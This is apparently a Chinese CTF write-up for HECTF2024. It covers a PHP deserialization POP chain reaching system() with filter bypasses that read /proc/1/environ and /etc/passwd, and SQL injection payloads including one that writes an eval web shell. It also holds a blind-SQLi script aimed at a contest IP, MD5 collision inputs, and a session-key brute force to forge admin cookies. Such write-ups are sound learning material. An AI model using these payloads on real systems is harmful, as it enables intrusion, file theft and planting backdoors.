HECTF2024
HECTF2024 web
baby_unserialize
分析过程:
<?php
error_reporting(0);
show_source(__FILE__);
echo "flag in /flag</br>";
class User{
public $name;
public $passwd;
public $msg;
public $token = "guest";
public function __construct($name,$passwd){
$this->name = $name;
$this->passwd = $passwd;
}
public function __wakeup(){//wakeup绕过
$this->token = "guest";//$token="admin";
}
public function __destruct(){
if(!$this->check()){
exit(0);
}else{
echo $this->msg;//4 $msg=new class01();
}
}
public function check(){
if ($this->token === "admin"){
return true;
}else{
return false;
}
}
}
class class00{
public function __call($a,$b){
return 1;
}
public function __set($a, $b){
$b();//2 $b=new class2();
}
}
class class01{
public $temp = 0;
public $str3;
public $cls;
public function __tostring(){
$this->temp = $this->cls->func1();
if ($this->temp === 1){//$temp=1;
$this->cls->str1 = $this->str3;//3 $cls=new class00(); $str3=new class2();
}else{
echo "0";
return "0";
}
return "have fun";
}
}
class class02{
public $payload;
public function __invoke(){
if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|;|date|bash|\$|\x00|`|env|\?|wget|\"|\'|\\\|php|id|whoami|=/i', $this->payload)) {
system($this->payload." >/dev/null 2>&1");//1
}else{
die("fuck you Hacker");
}
}
}
$pay='O:4:"User":5:{s:4:"name";N;s:6:"passwd";N;s:3:"msg";O:7:"class01":3:{s:4:"temp";i:1;s:4:"str3";O:7:"class02":1:{s:7:"payload";s:21:"dd if=/proc/1/environ";}s:3:"cls";O:7:"class00":0:{}}s:5:"token";s:5:"admin";}';
$user = unserialize($pay);
<?php
error_reporting(0);
class User{
public $name;
public $passwd;
public $msg;
public $token;
}
class class00{
}
class class01{
public $temp = 0;
public $str3;
public $cls;
}
class class02{
public $payload;
}
$a=new User();
$a->token="admin";
$a->msg=new class01();
$a->msg->temp=1;
$a->msg->cls=new class00();
$a->msg->str3=new class02();
$a->msg->str3->payload="join -a 2 /dev/null /fla[a-z] &";
echo (serialize($a));
//O:4:"User":4:{s:4:"name";N;s:6:"passwd";N;s:3:"msg";O:7:"class01":3:{s:4:"temp";i:1;s:4:"str3";O:7:"class02":1:{s:7:"payload";s:33:"join -a 2 /dev/null /etc/passwd &";}s:3:"cls";O:7:"class00":0:{}}s:5:"token";s:5:"admin";}
join命令可以读取文件,[]可以通配符
funny(misc)
第一张图片可以查jk fun百度地图找到是西外文化休闲广场
https://baijiahao.baidu.com/s?id=1807538314504083224
第二三张图主要根据拱桥,找到这个网址
https://beijing.qianlong.com/2022/0815/7523307.shtml
打开卫星地图
右侧有桥,左侧有蓝房子
HECTF{北京市-西城区-西外文化休闲广场-京城水系慈禧水道}
baby_sql
万能密码登录,跳转到worker.php
经测试有3列,过滤了['update', 'delete', 'drop', 'insert', 'join', 'hex', 'CHAR', 'information', 'updatexml', ' ', '--', '=', '<', '>']
位置均可回显
-Bob'%0Cunion%0Cselect%0C888,database(),666%23 ----> workers
-Bob'%0Cunion%0Cselect%0C888,(group_concat(table_name)),666%0Cfrom%0Cmysql.innodb_table_stats%0Cwhere%0Cdatabase_name%0Clike%0Cdatabase()%23
-Bob'%0Cunion select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "/var/www/html/1.php"%23
0x09 对等号=的绕过
不加通配符的like执行的效果和=一致,所以可以用来绕过;
时间盲注脚本(服务器报错远程主机强迫关闭了一个现有的连接,做不出来...)
import random
import requests
import time
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
def getName(url):
DBName = ''
print("开始获取长度...")
len = 0
for l in range(1,99):
time.sleep(0.5)
# payload = f" 'if((select length(database())={l}),sleep(2),1)" # 获取数据库名长度,可以更改为查表名长度,字段长度等
payload = "a'/**/or/**/if((select/**/length(database()))/**/like/**/{},sleep(10),sleep(0))#".format(l)
start_time = time.time()
data = {"name": payload}
res = conn.post(url=url, data=data) # 发送请求
end_time = time.time()
if end_time - start_time > 2:
print("数据库名长度为:"+str(l))
len = l
break
print("开始获取名...")
for i in range(1, len+1):
for j in range(33,127):
time.sleep(0.5)
# payload = f" ' or if(ascii(substr((database()),{i},1))={j},sleep(2),0)" # 获取数据库名,可以更改为查表名,字段名等
payload = "a'/**/Or/**/if(substr(database(),{},1)/**/like/**/'{}',sLeep(10),sLeep(0))#".format(i, j)
data = {"name": payload}
start_time = time.time()
res = conn.post(url=url,data=data)
end_time = time.time()
if end_time - start_time > 2:
DBName += chr(j)
print(DBName)
break
return DBName
if __name__ == '__main__':
url="http://101.132.58.9:31298/worker.php" #目标url
print(getName(url)) #调用函数
非预期:
主页面sqlmap打时间盲注
ezweb
注释源码
if($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b'])) {
if ($_GET['c'] != $_GET['d'] && md5($_GET['c']) === md5($_GET['d'])) {
if (isset($_GET['guess']) && md5($_GET['guess']) === 'aa476cf7143fe69c29b36e4d0a793604') { //xxxxx2024
highlight_file("secret.php");
}
}
}
经典md5
a=QNKCDZO&
b=240610708
&c=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&d=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
&guess=hECTf2024
暴力破解脚本
import hashlib
def md5_decrypt(target_md5):
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for char1 in characters:
for char2 in characters:
for char3 in characters:
for char4 in characters:
for char5 in characters:
data = char1 + char2 + char3 + char4 + char5 + '2024'
md5 = hashlib.md5()
md5.update(data.encode('utf-8'))
if md5.hexdigest() == target_md5:
return data
return "Not found"
target_md5 = "aa476cf7143fe69c29b36e4d0a793604"
decrypted_data = md5_decrypt(target_md5)
print("MD5 decrypted data:", decrypted_data)
hECTf2024
//secret.php
<?php
error_reporting(0);
//mt_srand(rand(1e5,1e7));
//$key = rand();
//file_put_contents(*,$key);
function session_decrypt($session,$key){
$data = base64_decode($session);
$method = 'AES-256-CBC';
$iv_size = openssl_cipher_iv_length($method);
$iv = substr($data,0,$iv_size);
$enc = substr($data,$iv_size);
return openssl_decrypt($enc, $method, $key, 1, $iv);
}
暴力破解
<?php
error_reporting(0);
//file_put_contents(*,$key);
function session_decrypt($session,$key){
$data = base64_decode($session);
$method = 'AES-256-CBC';
$iv_size = openssl_cipher_iv_length($method);
$iv = substr($data,0,$iv_size);
$enc = substr($data,$iv_size);
return openssl_decrypt($enc, $method, $key, 1, $iv);
}
$token='IMP%2Fa7nAmviTRolzhTvySinG%2FX7FUmJ%2FzYKCPHUu6a52%2BcLCYXoI5rOOOkg5iZRo6qSII44QXSEpLmAHhm9boPAQZ8FUbqKPyKNOChhOiPdxS0%2FMMaAozJBAC5eKI0kX';
$token = urldecode($token);
for($i=100000;$i<=10000000;$i++){
mt_srand($i);
$key=rand();
$out = session_decrypt($token,$key);
if($out !== false and preg_match('/guest/',$out)){
echo $out;
echo $key;
break;
}
}
结果O:4:"User":2:{s:8:"username";s:5:"guest";s:4:"role";s:5:"guest";} key=385780431
//加密
function session_encrypt($message,$key){
$method = 'AES-256-CBC';
$iv_size = openssl_cipher_iv_length($method);
$iv = openssl_random_pseudo_bytes($iv_size);
$enc = openssl_encrypt($message, $method, $key, OPENSSL_RAW_DATA, $iv);
return base64_encode($iv.$enc);
}
var_dump(session_encrypt('O:4:"User":2:{s:8:"username";s:5:"guest";s:4:"role";s:5:"admin";}',385780431));
浙公网安备 33010602011771号